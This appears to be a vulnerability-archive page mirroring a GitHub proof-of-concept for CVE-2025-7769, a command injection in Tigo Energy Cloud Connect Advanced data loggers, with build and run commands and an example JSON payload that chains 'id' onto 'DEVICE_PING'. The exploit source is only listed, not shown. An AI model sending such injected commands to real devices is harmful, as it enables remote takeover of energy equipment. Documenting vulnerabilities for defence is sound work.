CVE-2025-7769 PoC — Tigo Energy Cloud Connect Advanced 命令注入漏洞

Source

https://github.com/byteReaper77/CVE-2025-7769

Associated Vulnerability

Title:Tigo Energy Cloud Connect Advanced 命令注入漏洞 (CVE-2025-7769)
Description:Tigo Energy Cloud Connect Advanced是美国Tigo Energy公司的一款紧凑型数据记录器。 Tigo Energy Cloud Connect Advanced存在命令注入漏洞，该漏洞源于命令注入，可能导致远程代码执行。

Description

PoC to inject a command via the DEVICE_PING endpoint

Readme

# CVE-2025-7769 – Remote Command Injection in mobile_api

## Description :

This repository contains a Proof‑of‑Concept (PoC) exploit for **CVE‑2025‑7769**, a critical remote **Command Injection** vulnerability found in Tigo Energy CCA appliances exposing the `/cgi-bin/mobile_api` endpoint.

The vulnerability is triggered by injecting OS commands via the `cmd` JSON key, where unfiltered input is concatenated directly into a system call, allowing full remote code execution (RCE) on the device.

## References :
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-7769

## Usage :

```
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.

Use -u http://target.com if you want to pass a full base URL instead of IP/port.

Example Payload :

{
  "cmd": "DEVICE_PING;id",
  "dev": 2,
  "ver": 1
}
```
## License :
MIT License

File Snapshot


 [4.0K]  /data/pocs/726b860d39aa0f3f1d279acff03fb1674c2f016c
├── [ 15K]  exploit.c
├── [1.0K]  LICENSE
└── [ 948]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!